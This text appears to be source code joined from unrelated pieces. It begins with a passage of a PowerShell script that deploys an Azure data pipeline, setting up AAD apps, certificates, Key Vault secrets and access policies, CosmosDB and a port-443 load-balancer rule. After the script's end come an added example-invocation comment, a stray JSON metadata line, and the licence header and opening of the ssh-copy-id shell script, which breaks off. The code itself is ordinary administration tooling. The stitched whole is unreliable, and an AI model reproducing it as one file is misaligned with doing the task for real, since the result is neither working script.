$tokens.Add('maxNodesForHDInsightAutoScaling', $maxNodesForHDInsightAutoScaling) } } $tokens.Add('sparkType', $sparkType) $tokens.Add('keyvaultPrefix', $keyvaultPrefix) $tokens.Add('dataxJobTemplate', $dataxJobTemplate) $tokens.Add('dataxKafkaJobTemplate', $dataxKafkaJobTemplate) $tokens.Add('dataxBatchJobTemplate', $dataxBatchJobTemplate) # CosmosDB $tokens.Add('blobopsconnectionString', $blobopsconnectionString ) $tokens.Add('configgenClientId', $azureADApplicationConfiggenApplicationId ) $tokens.Add('configgenTenantId', $tenantName ) # SF Template $tokens.Add('certPrimaryThumbprint', $certPrimary.Certificate.Thumbprint ) $tokens.Add('certPrimarySecretId', $certPrimary.SecretId ) $tokens.Add('certReverseProxyThumbprint', $certReverseProxy.Certificate.Thumbprint ) $tokens.Add('certReverseProxySecretId', $certReverseProxy.SecretId ) $tokens.Add('sslcertThumbprint', $certSSL.Certificate.Thumbprint ) $tokens.Add('resourceLocationForServiceFabric', $resourceLocationForServiceFabric ) $tokens.Add('vmNodeTypeSize', $vmNodeTypeSize ) $tokens.Add('vmNodeinstanceCount', $vmNodeinstanceCount ) # Spark 
Template $tokens.Add('vmSizeSparkHeadnode', $vmSizeSparkHeadnode ) $tokens.Add('minInstanceCountSparkHeadnode', $minInstanceCountSparkHeadnode ) $tokens.Add('targetInstanceCountSparkHeadnode', $targetInstanceCountSparkHeadnode ) $tokens.Add('vmSizeSparkWorkernode', $vmSizeSparkWorkernode ) $tokens.Add('targetInstanceCountSparkWorkernode', $targetInstanceCountSparkWorkernode ) # Service param $tokens.Add('writerRole', $writerRole ) $tokens.Add('readerRole', $readerRole ) $tokens.Add('serviceSecretPrefix', $serviceSecretPrefix ) $tokens.Add('clientSecretPrefix', $clientSecretPrefix ) $tokens.Add('serviceAppId', $azureADApplicationConfiggenApplicationId ) $tokens.Add('clientAppId', $azureADApplicationApplicationId ) $tokens.Add('azureADApplicationConfiggenResourceId', $azureADApplicationConfiggenResourceId ) $aiKey = '' $appInsight = Get-AzureRmApplicationInsights -resourceGroupName $resourceGroupName -Name $appInsightsName -ErrorAction SilentlyContinue if ($appInsight) { $aiKey = $appInsight.InstrumentationKey } $tokens.Add('appInsightKey', $aiKey ) $tokens.Add('resourceLocation', $resourceGroupLocation ) $certtype = '' if ($useSelfSignedCerts -eq 'y') { $certtype = 'test' } $tokens.Add('certtype', $certtype ) $kafkaNativeConnectionString = '' $kafkaNativeTopics = '' if($enableKafkaSample -eq 'y') { $kafkaNativeConnectionString = "datagen-kafkaNativeConnectionString" $kafkaNativeTopics = "kafka1,kafka2" } $tokens.Add('kafkaNativeConnectionString', $kafkaNativeConnectionString) $tokens.Add('kafkaNativeTopics', $kafkaNativeTopics) $tokens } # Get appRole definition function Create-AppRole([string] $Name, [string] $AppName, [string] $Description) { $appRole = New-Object Microsoft.Open.AzureAD.Model.AppRole $appRole.AllowedMemberTypes = New-Object System.Collections.Generic.List[string] $appRole.AllowedMemberTypes.Add("User"); if (($Name -eq $writerRole) -and ($AppName -eq $serviceAppName)) { $appRole.AllowedMemberTypes.Add("Application"); } $appRole.DisplayName = $Name $appRole.Id = New-Guid $appRole.IsEnabled = $true $appRole.Description = $Description $appRole.Value = $Name $appRole } # Add appRoles to AAD app function Set-AzureAADAppRoles([string]$AppName) { $role_r = Create-AppRole -Name $readerRole -AppName $AppName -Description $readerRole + " have ability to view flows" $role_w = Create-AppRole -Name $writerRole -AppName $AppName -Description $writerRole + " can manage flows" $roles = @($role_r, $role_W) $app = Get-AzureADApplication -Filter "DisplayName eq '$AppName'" if ($app.AppRoles) { foreach($r in $roles) { $role = $app.AppRoles | Where-Object { $_.Value -match $r.Value } if (!$role) { $app.AppRoles.Add($r) Set-AzureADApplication -ObjectId $app.ObjectId -AppRoles $app.AppRoles } } } else { foreach($r in $roles) { $app.AppRoles.Add($r) | Out-Null } Set-AzureADApplication -ObjectId $app.ObjectId -AppRoles $app.AppRoles } } # Add user with appRoles to service principal function Add-UserAppRole([string]$AppName) { $sp = Get-AzureADServicePrincipal -Filter "DisplayName eq '$AppName'" $appRole = $sp.AppRoles | Where-Object { $_.Value -match $writerRole } try { New-AzureADUserAppRoleAssignment -ObjectId $userId -PrincipalId $userId -ResourceId $sp.ObjectId -Id $appRole.Id } catch {} } # Set secret to AAD app function Set-AzureAADAppSecret([string]$AppName) { $app = Get-AzureRmADApplication -DisplayName $AppName if ($app) { $startDate = Get-Date $endDate = $startDate.AddYears(2) $keyValue = New-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId -StartDate $startDate -EndDate 
$endDate } $keyValue } # Set credential to AAD app function Set-AzureAADAppCert([string]$AppName) { $app = Get-AzureRmADApplication -DisplayName $AppName if ($app) { $cer = $certPrimary.Certificate $certValue = [System.Convert]::ToBase64String($cer.GetRawCertData()) az ad app credential reset --append --id $app.ApplicationId --cert $certValue } } # Set secret to AAD app function Generate-AADApplication([string]$appName, [string]$websiteName) { $app = Get-AzureRmADApplication -DisplayName $appName if (!$app) { if ($websiteName){ $app = New-AzureRmADApplication -DisplayName $appName -IdentifierUris "https://$tenantName/$appName" -ReplyUrls "https://$websiteName.azurewebsites.net/authReturn" } else { $app = New-AzureRmADApplication -DisplayName $appName -IdentifierUris "https://$tenantName/$appName" } } if ($app) { $urls = $app.IdentifierUris if ($urls.Count -eq 0) { Set-AzureRmADApplication -ObjectId $app.ObjectId -IdentifierUris "https://$tenantName/$appName" -ErrorAction SilentlyContinue } } if ($websiteName) { $urls = $app.ReplyUrls $urls.Add("https://$websiteName.azurewebsites.net/authReturn") Set-AzureRmADApplication -ObjectId $app.ObjectId -ReplyUrl $urls -ErrorAction SilentlyContinue } $servicePrincipal = Get-AzureRmADServicePrincipal -ApplicationId $app.ApplicationId if (!$servicePrincipal) { $servicePrincipal = New-AzureRmADServicePrincipal -ApplicationId $app.ApplicationId } $app } # Generate SelfSigned Certs function Generate-SelfSignedCert([string] $certFileName, [string] $outputPath) { $todaydt = Get-Date $2years = $todaydt.AddYears(2) $clustername = "$serviceFabricName" $subject = "CN=$clustername"+ ".$resourceLocationForServiceFabric" + ".cloudapp.azure.com" $certFilePath = Join-Path $outputPath $certFileName $password = ConvertTo-SecureString $certPwd -AsPlainText -Force $cert = New-SelfSignedCertificate -Subject $subject -notafter $2years -CertStoreLocation cert:\LocalMachine\My # Export the cert to a PFX with password Export-PfxCertificate -Cert "cert:\LocalMachine\My\$($cert.Thumbprint)" -FilePath $certFilePath -Password $password | Out-Null Import-PfxCertificate -FilePath $certFilePath -CertStoreLocation cert:\CurrentUser\My -Password $password | Out-Null $certFilePath } # Import Certs to keyVault function Import-CertsToKeyVault([string]$certPath) { $certPath = $certPath.Replace("""", "") $certBaseName = ((Get-Item $certPath).Name).Replace(".", "") $password = ConvertTo-SecureString $certPwd -AsPlainText -Force # Upload to Key Vault if ($serviceFabricCreation -eq 'y') { $cert = Import-AzureKeyVaultCertificate -VaultName $sfKVName -Name $certBaseName -FilePath $certPath -Password $password } else { $cert = Get-AzureKeyVaultCertificate -VaultName $sfKVName -Name $certBaseName } $cert } # Add script actions to Spark function Add-ScriptActions { $clusterName = "$sparkName" $scriptActionName = "StartMSIServer" $scAction = Get-AzureRmHDInsightScriptActionHistory -ClusterName $clusterName if (($scAction.Name -eq "$scriptActionName") -and ($scAction.Status -eq 'succeeded')) { return } $tokens = Get-Tokens Deploy-Files -saName $sparkBlobAccountName -containerName "scripts" -filter "*.*" -filesPath "$deploymentCommonPath\Scripts" -targetPath "" -translate $True -tokens $tokens $scriptActionUri = "https://$sparkBlobAccountName.blob.core.windows.net/scripts/startmsiserverservice.sh" $nodeTypes = "headnode", "workernode" Submit-AzureRmHDInsightScriptAction -ClusterName $clusterName ` -Name $scriptActionName ` -Uri $scriptActionUri ` -NodeTypes $nodeTypes ` -PersistOnSuccess } # Setup 
cosmosDB function Setup-CosmosDB { Connect-Mdbc -ConnectionString $dbCon -DatabaseName "production" $colnames = @( "commons", "configgenConfigs", "flows", "sparkClusters" "sparkJobs" ) $colnames | foreach { try{ $response = Add-MdbcCollection -Name $_ if (!$response) { throw } } catch {} } $templatePath = "$deploymentCommonPath\CosmosDB" $outputPath = Get-OutputFilePath $qry = New-MdbcQuery -Name "_id" -Exists $colnames | foreach{ $colName = $_ $collection1 = $Database.GetCollection($colName) Remove-MdbcData -Query $qry -Collection $collection1 $templateName = "$colName.json" $outputFile = Join-Path $outputPath "_$templateName" $filePath = Join-Path $templatePath $templateName $tokens = Get-Tokens $rawData = Get-Content -Raw -Path $filePath $rawData = Translate-Tokens -Source $rawData -Tokens $tokens $json = ConvertFrom-Json -InputObject $rawData $json | foreach { try { $_ | ConvertTo-Json -Depth 10 | Set-Content -Encoding Unicode $outputFile $input = Import-MdbcData $outputFile -FileFormat Json $response = Add-MdbcData -InputObject $input -Collection $collection1 -NewId if (!$response) { throw } } catch{} } } Remove-Module Mdbc } # Create secrets to keyVaults for Spark function Setup-SecretsForCert { $vaultName = "$sfKVName" $secretName = "certpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $certPwd } # Create secrets to keyVaults for Spark function Setup-SecretsForSpark { $vaultName = "$sparkRDPKVName" $secretName = "sparkLogin" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparkLogin $secretName = "sparkclusterloginpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparkPwd $secretName = "sparksshuser" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparksshuser $secretName = "sparksshpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparkSshPwd $vaultName = "$servicesKVName" $prefix = "$serviceSecretPrefix-" $secretName = $prefix + "livyconnectionstring-" + $sparkName $tValue = "endpoint=https://$sparkName.azurehdinsight.net/livy;username=$sparkLogin;password=$sparkPwd" if ($useDatabricks -eq 'y') { $tValue = "endpoint=https://$resourceGroupLocation.azuredatabricks.net/api/2.0/;dbtoken=" } Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue } # Create secrets to keyVaults for SF function Setup-SecretsForServiceFabric { $vaultName = "$fabricRDPKVName" $secretName = "sfadminpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sfPwd $secretName = "sfadminuser" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sfadminuser } # Create secrets to keyVaults function Setup-Secrets { $vaultName = "$servicesKVName" $prefix = "$serviceSecretPrefix-" $secretName = $prefix + "configgenconfigs" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $dbCon $secretName = $prefix + "configgenconfigsdatabasename" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "production" $secretName = $prefix + $configBlobAccountName + "-blobconnectionstring" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $blobopsconnectionString $secretName = $prefix + $sparkBlobAccountName + "-blobconnectionstring" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $blobsparkconnectionString $secretName = $prefix + "aiInstrumentationKey" $aiKey = (Get-AzureRmApplicationInsights -resourceGroupName $resourceGroupName -Name $appInsightsName).InstrumentationKey Setup-Secret -VaultName $vaultName 
-SecretName $secretName -Value $aiKey $secretName = $prefix + "tenantid" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tenantName $secretName = $prefix + "clientId" $tValue = ($azureADApplicationConfiggenApplicationId.Split(" "))[0] Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "clientsecret" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $azureADAppSecretConfiggenValue $secretName = $prefix + "eventhubnamespaceconnectionstring" $tValue = (Invoke-AzureRmResourceAction -ResourceGroupName $resourceGroupName -ResourceType Microsoft.EventHub/namespaces/AuthorizationRules -ResourceName "$eventHubNamespaceName/listen" -Action listKeys -ApiVersion 2015-08-01 -Force).primaryConnectionString Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "azureservicesauthconnectionstring" $tValue = "<Parameter Name=""AzureServicesAuthConnectionString"" Value=""RunAs=App;AppId=" + $azureADApplicationConfiggenApplicationId + ";TenantId=" + $tenantId + ";CertificateThumbprint=" + $certPrimary.Certificate.Thumbprint + ";CertificateStoreLocation=LocalMachine""/>" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "cacertificatelocation" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $caCertificateLocation $prefix = "$clientSecretPrefix-" $secretName = $prefix + "aiKey" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $aiKey $secretName = $prefix + "clientId" $tValue = ($azureADApplicationApplicationId.Split(" "))[0] Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "clientSecret" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $azureADAppSecretValue $secretName = $prefix + "serviceClusterUrl" $sfName = "$serviceFabricName" $tValue = "https://$sfName"+ ".$resourceLocationForServiceFabric" + ".cloudapp.azure.com" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "serviceResourceId" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $azureADApplicationConfiggenResourceId $secretName = $prefix + "mongoDbUrl" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "test" $secretName = $prefix + "redisDataConnectionString" $redisKey = (Get-AzureRmRedisCacheKey -Name $redisName -resourceGroupName $resourceGroupName).PrimaryKey Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "$redisName.redis.cache.windows.net:6380,password=$redisKey,ssl=True,abortConnect=False" $secretName = $prefix + "sessionSecret" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "test" $secretName = $prefix + "subscriptionId" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $subscriptionId $secretName = $prefix + "tenantName" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tenantName $prefix = "" $storageAccount = Get-AzureRmStorageAccount -resourceGroupName $resourceGroupName -Name $sparkBlobAccountName $tValue = "" if ($storageAccount.Context.ConnectionString -match 'AccountKey=(.*)') { $tValue = $Matches[1].Replace("AccountKey=", "") } $secretName = $prefix + "datagen-storageaccountAccesskey" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $vaultName = "$sparkKVName" $secretName = $prefix + "datax-sa-" + $configBlobAccountName Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue 
$storageAccount = Get-AzureRmStorageAccount -resourceGroupName $resourceGroupName -Name $sparkBlobAccountName $tValue = "" if ($storageAccount.Context.ConnectionString -match 'AccountKey=(.*)') { $tValue = $Matches[1].Replace("AccountKey=", "") } $secretName = $prefix + "datax-sa-" + $sparkBlobAccountName Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "metric-eventhubconnectionstring" $tValue = (Get-AzureRmEventHubKey -resourceGroupName $resourceGroupName -NamespaceName "$eventHubNamespaceName" -EventHubName metricseventhub -AuthorizationRuleName send).PrimaryConnectionString Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue } # Setup keyVault access function Setup-KVAccess { # Get ObjectId of web app $servicePrincipalId = az resource show -g $resourceGroupName --name $websiteName --resource-type Microsoft.Web/sites --query identity.principalId # Get ObjectId of vmss $vmssId = az resource show -g $resourceGroupName --name $vmNodeTypeName --resource-type Microsoft.Compute/virtualMachineScaleSets --query identity.principalId # Get ObjectId of Service app try { $servicePrincipalConfiggenId = az ad sp list --display-name $serviceAppName --query [0].objectId } catch { Write-Host "Error on getting the service principal objectId" Exit 30 } az keyvault set-policy --name $servicesKVName --object-id $servicePrincipalId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $servicesKVName --object-id $servicePrincipalConfiggenId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $servicesKVName --object-id $vmssId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $servicePrincipalId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $servicePrincipalConfiggenId --secret-permissions get, list, set, delete > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $vmssId --secret-permissions get, list, set > $null 2>&1 if($useDatabricks -eq 'n') { # Get ObjectId of sparkManagedIdentityName $SparkManagedIdentityId = az resource show -g $resourceGroupName --name $sparkManagedIdentityName --resource-type Microsoft.ManagedIdentity/userAssignedIdentities --query properties.principalId az keyvault set-policy --name $servicesKVName --object-id $SparkManagedIdentityId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $SparkManagedIdentityId --secret-permissions get, list, set > $null 2>&1 } } # Import SSL Cert To Service Fabric function Import-SSLCertToSF([string]$certPath) { $certPath = $certPath.Replace("""", "") $certBaseName = (Get-Item $certPath).BaseName $clustername = "$serviceFabricName" $bytes = [System.IO.File]::ReadAllBytes($certPath) $base64 = [System.Convert]::ToBase64String($bytes) $jsonBlob = @{ data = $base64 dataType = 'pfx' password = $certPwd } | ConvertTo-Json $contentbytes = [System.Text.Encoding]::UTF8.GetBytes($jsonBlob) $content = [System.Convert]::ToBase64String($contentbytes) $secretValue = ConvertTo-SecureString -String $content -AsPlainText -Force # Upload the certificate to the key vault as a secret Write-Host "Writing secret to $certBaseName in vault $sfKVName" $secret = Set-AzureKeyVaultSecret -VaultName $sfKVName -Name $certBaseName -SecretValue $secretValue # Add a certificate to all the VMs in the cluster. 
Add-AzureRmServiceFabricApplicationCertificate -resourceGroupName $resourceGroupName -Name $clustername -SecretIdentifier $secret.Id | Out-Null } # Open 443 port function Open-Port { $probename = "AppPortProbe6" $rulename = "AppPortLBRule6" $port = 443 # Get the load balancer resource $resource = Get-AzureRmResource | Where {$_.resourceGroupName -eq $resourceGroupName -and $_.ResourceType -eq "Microsoft.Network/loadBalancers" -and $_.Name -like "LB-*"} $slb = Get-AzureRmLoadBalancer -Name $resource.Name -resourceGroupName $resourceGroupName $probe = Get-AzureRmLoadBalancerProbeConfig -Name $probename -LoadBalancer $slb -ErrorAction SilentlyContinue if (!($probe)) { # Add a new probe configuration to the load balancer $slb | Add-AzureRmLoadBalancerProbeConfig -Name $probename -Protocol Tcp -Port $port -IntervalInSeconds 15 -ProbeCount 2 | Out-Null $probe = Get-AzureRmLoadBalancerProbeConfig -Name $probename -LoadBalancer $slb } $rule = get-AzureRmLoadBalancerRuleConfig -LoadBalancer $slb -Name $rulename -ErrorAction SilentlyContinue if (!($rule)) { # Add rule configuration to the load balancer $slb | Add-AzureRmLoadBalancerRuleConfig -Name $rulename -BackendAddressPool $slb.BackendAddressPools[0] -FrontendIpConfiguration $slb.FrontendIpConfigurations[0] -Probe $probe -Protocol Tcp -FrontendPort $port -BackendPort $port | Out-Null } # Set the goal state for the load balancer $slb | Set-AzureRmLoadBalancer | Out-Null } # Setup Service Fabric cluster. # Import SSL cert and open 443 port function Setup-SF { Import-SSLCertToSF -certPath "$sslCert" Open-Port } # Generate paramter files for the service deployment function Translate-ParameterFiles([string] $ParameterFilePath, [system.collections.generic.dictionary[string,string]]$Tokens) { $rawData = Get-Content -Raw -Path $ParameterFilePath $rawData = Translate-Tokens -Source $rawData -Tokens $Tokens $rawData } # Generate paramter files for the service deployment function Generate-ParameterFiles([string] $parametersFolder = '', [string] $parametersOutputFolder = '') { New-Item -ItemType Directory -Force -Path $parametersOutputFolder -ErrorAction SilentlyContinue $allParameters = Get-ChildItem -Path $parametersFolder -Filter *.json -File -Recurse $tokens = Get-Tokens foreach($parameterFile in $allParameters) { $translatedData = Translate-ParameterFiles -ParameterFilePath $parameterFile.FullName -Token $tokens $filePath = [System.IO.Path]::Combine($parametersOutputFolder, $parameterFile.Name) Set-Content -Path $filePath -Value $translatedData } } # Prepare steps for the service deployment function Prepare-AppDeployment { $parametersFolder = Join-Path -Path $deploymentAppPath -ChildPath "Services\Parameters" $parametersOutputFolder = Join-Path -Path $deploymentAppPath -ChildPath "Outputs\Services\Parameters" Generate-ParameterFiles -parametersFolder $parametersFolder -parametersOutputFolder $parametersOutputFolder } # Prepare steps for the service deployment function Prepare-AdminSteps { $parameterFile = Join-Path $adminParameterPath "adminsteps.parameters.txt" $parameterFileOutput = Join-Path $deploymentAppPath "adminsteps.parameters.txt" $tokens = Get-Tokens $translatedData = Translate-ParameterFiles -ParameterFilePath $parameterFile -Token $tokens Set-Content -Path $parameterFileOutput -Value $translatedData } #****************************************************************************** # Script body # Execution begins here #****************************************************************************** $ErrorActionPreference = "stop" 
Push-Location $PSScriptRoot Write-Host -ForegroundColor Green "Total estimated time to complete: 2 to 4 hours" if ($installModules -eq 'y') { Install-Modules } Check-FilePath # sign in Write-Host "Logging in..." # select subscription Write-Host "Selecting subscription '$subscriptionId'" Check-Credential -SubscriptionId $subscriptionId -TenantId $tenantId Write-Host "Logging in for AzureAD" $acc = Connect-AzureAD -TenantId $tenantId $tenantName = $acc.Tenant.Domain $tenantId = $acc.Tenant.Id.Guid $userId = (az ad signed-in-user show --query 'objectId').Replace("""", "") # Check login info if (!($tenantName) -or !($tenantId) -or !($userId)) { Write-Host "Error on getting tenantName, tenantId or userId" Exit 100 } # Output login info Write-Host "tenantId: " $tenantId Write-Host "tenantName: " $tenantName Write-Host "userId: " $userId # Create or check for existing resource group $resourceGroup = Get-AzureRmResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue if(!$resourceGroup) { Write-Host "Resource group '$resourceGroupName' does not exist" if(!$resourceGroupLocation) { $resourceGroupLocation = Read-Host "resourceGroupLocation" } Write-Host "Creating resource group '$resourceGroupName' in location '$resourceGroupLocation'" New-AzureRmResourceGroup -Name $resourceGroupName -Location $resourceGroupLocation } else { Write-Host "Using existing resource group '$resourceGroupName'" $resourceGroupLocation = $resourceGroup.Location } $templatePath = $resourcesTemplatePath Write-Host -ForegroundColor Green "Starting deployment..." if($resourceCreation -eq 'y') { Write-Host -ForegroundColor Green "Deploying resources (1/16 steps): All resources except HDInsight and Service Fabric clusters will be deployed" Write-Host -ForegroundColor Green "Estimated time to complete: 40 mins" $tokens = Get-Tokens Deploy-Resources -templateName "Resource-Template.json" -paramName "Resource-parameter.json" -templatePath $templatePath -tokens $tokens } if($sparkCreation -eq 'y') { Write-Host -ForegroundColor Green "Deploying resources (2/16 steps): A spark cluster will be deployed" Setup-SecretsForSpark $tokens = Get-Tokens if ($useDatabricks -eq 'n') { $sparkTemplate = "Spark-Template.json" $sparkParameter = "Spark-parameter.json" $version = ($HDInsightVersion -split '\.')[0] $version = [int]$version if ($version -ge 4 -and $enableHDInsightAutoScaling -eq 'y') { $sparkTemplate = "Spark-AutoScale-Template.json" $sparkParameter = "Spark-AutoScale-parameter.json" } Write-Host "sparkTemplate: '$sparkTemplate' ; sparkParameter: '$sparkParameter'" Write-Host -ForegroundColor Green "Estimated time to complete: 20 mins" Deploy-Resources -templateName $sparkTemplate -paramName $sparkParameter -templatePath $templatePath -tokens $tokens } else { Write-Host -ForegroundColor Green "Estimated time to complete: 5 mins" Deploy-Resources -templateName "Databricks-Template.json" -paramName "Databricks-Parameter.json" -templatePath $templatePath -tokens $tokens } } # Preparing certs... if ($generateNewSelfSignedCerts -eq 'y') { Write-Host "Generating SelfSigned certs..." New-Item -ItemType Directory -Force -Path $certPath -ErrorAction SilentlyContinue $mainCert = Generate-SelfSignedCert -certFileName "certprimary$name.pfx" -outputPath $certPath $reverseProxyCert = Generate-SelfSignedCert -certFileName "certreverseproxy$name.pfx" -outputPath $certPath $sslCert = Generate-SelfSignedCert -certFileName "certssl$name.pfx" -outputPath $certPath } Write-Host "processing certs..." 
$certPrimary = Import-CertsToKeyVault -certPath $mainCert $certReverseProxy = Import-CertsToKeyVault -certPath $reverseProxyCert $certSSL = Import-CertsToKeyVault -certPath $sslCert #aad Write-Host -ForegroundColor Green "processing AAD... (3/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 2 mins" $azureADApplication = Generate-AADApplication -appName $clientAppName -websiteName $websiteName $azureADApplicationConfiggen = Generate-AADApplication -appName $serviceAppName $azureADApplicationApplicationId = $azureADApplication.ApplicationId.Guid $azureADApplicationConfiggenApplicationId = $azureADApplicationConfiggen.ApplicationId.Guid $azureADApplicationConfiggenResourceId = $azureADApplicationConfiggen.IdentifierUris[0] $azureADAppSecret = Set-AzureAADAppSecret -AppName $clientAppName $azureADAppSecretConfiggen = Set-AzureAADAppSecret -AppName $serviceAppName Set-AzureAADAppCert -AppName $serviceAppName $azureADAppSecretValue = $azureADAppSecret.Value $azureADAppSecretConfiggenValue = $azureADAppSecretConfiggen.Value Set-AzureAADAppRoles -AppName $clientAppName Set-AzureAADAppRoles -AppName $serviceAppName Add-UserAppRole -AppName $clientAppName Add-UserAppRole -AppName $serviceAppName Set-AzureAADAccessControl -AppId $azureADApplicationConfiggenApplicationId Set-AzureAADApiPermission -ServiceAppId $azureADApplicationConfiggenApplicationId -ClientAppId $azureADApplicationApplicationId -RoleName $writerRole if($serviceFabricCreation -eq 'y') { Write-Host -ForegroundColor Green "Deploying resources (4/16 steps): A Service fabric cluster will be deployed" Write-Host -ForegroundColor Green "Estimated time to complete: 20 mins" Setup-SecretsForServiceFabric Setup-SecretsForCert $tokens = Get-Tokens Deploy-Resources -templateName "SF-Template.json" -paramName "SF-parameter.json" -templatePath $templatePath -tokens $tokens } # Processing $dbCon = Get-CosmosDBConnectionString -Name $docDBName $blobopsconnectionString = Get-StorageAccountConnectionString -Name $configBlobAccountName $blobsparkconnectionString = Get-StorageAccountConnectionString -Name $sparkBlobAccountName Write-Host "Prepare for the service deployment..." Prepare-AppDeployment Write-Host "Prepare for the admin steps..." Prepare-AdminSteps # Secrets if ($setupSecrets -eq 'y') { Write-Host -ForegroundColor Green "Setting up Secrets... (5/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 1 min" Setup-Secrets } # Spark if ($sparkCreation -eq 'y') { Write-Host -ForegroundColor Green "Setting up ScriptActions... (6/16 steps)" if ($useDatabricks -eq 'n') { Write-Host -ForegroundColor Green "Estimated time to complete: 2 mins" Add-ScriptActions } } # cosmosDB if ($setupCosmosDB -eq 'y') { Write-Host -ForegroundColor Green "Setting up CosmosDB... (7/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 1 min" Setup-CosmosDB } # Access Policies if ($setupKVAccess -eq 'y') { Write-Host -ForegroundColor Green "Setting up KV access... (8/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 2 mins" Setup-KVAccess } # setup SF if ($serviceFabricCreation -eq 'y') { Write-Host -ForegroundColor Green "Setting up SF... (9/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 60 mins" Setup-SF } # Clean up \Temp folder Write-Host "Cleaning up the cache files..." CleanUp-Folder -FolderName $tempPath Exit 0
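# Example invocation (a sketch, not part of the original script): assuming this
# file is saved as deploy.ps1 with common.parameters.txt beside it, a typical
# run from an elevated PowerShell prompt might look like the following. The
# resource group and product names are hypothetical placeholders; every
# parameter shown is declared in the param() block at the top of this script.
#
#   .\deploy.ps1 -ParamFile common.parameters.txt `
#       -subscriptionId '<YOUR-SUBSCRIPTION-ID>' `
#       -resourceGroupName 'datax-rg' `
#       -productName 'datax' `
#       -certPassword '<CERT-PASSWORD>' `
#       -sparkPassword '<SPARK-PASSWORD>' `
#       -sparkSshPassword '<SPARK-SSH-PASSWORD>' `
#       -sfPassword '<SERVICE-FABRIC-PASSWORD>'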
{ "pile_set_name": "Github" }
#!/bin/sh

# Copyright (c) 1999-2016 Philip Hands <[email protected]>
#               2013 Martin Kletzander <[email protected]>
#               2010 Adeodato =?iso-8859-1?Q?Sim=F3?= <[email protected]>
#               2010 Eric Moret <[email protected]>
#               2009 Xr <[email protected]>
#               2007 Justin Pryzby <[email protected]>
#               2004 Reini Urban <[email protected]>
#               2003 Colin Watson <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

# Shell script to install your public key(s) on a remote machine
# See the ssh-copy-id(1) man page for details

# check that we have something mildly sane as our shell, or try to find something better
if false ^ printf "%s: WARNING: ancient shell, hunting for a more modern one... " "$0"
then
  SANE_SH=${SANE_SH:-/usr/bin/ksh}
  if printf 'true ^ false\n' | "$SANE_SH"
  then
    printf "'%s' seems viable.\n" "$SANE_SH"
    exec "$SANE_SH" "$0" "$@"
  else
    cat <<-EOF
oh dear.

If you have a more recent shell available, that supports \$(...) etc.
please try setting the environment variable SANE_SH to the path of that
shell, and then retry running this script. If that works, please report
a bug describing your setup, and the shell you used to make it work.

EOF
